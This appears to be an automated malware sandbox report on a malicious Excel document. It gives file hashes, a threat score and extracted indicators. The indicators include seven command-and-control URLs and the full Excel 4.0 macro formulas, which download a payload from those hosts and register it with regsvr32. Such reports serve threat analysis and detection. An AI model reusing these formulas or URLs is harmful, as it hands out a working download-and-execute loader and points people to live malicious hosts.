General

  • Target

    5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

  • Size

    33KB

  • Sample

    240909-12gfsasfpj

  • MD5

    325803f2534dac63d8d714da437fad96

  • SHA1

    e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe

  • SHA256

    5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

  • SHA512

    72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b

  • SSDEEP

    768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Targets

    • Target

      5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

    • Size

      33KB

    • MD5

      325803f2534dac63d8d714da437fad96

    • SHA1

      e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe

    • SHA256

      5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

    • SHA512

      72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b

    • SSDEEP

      768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks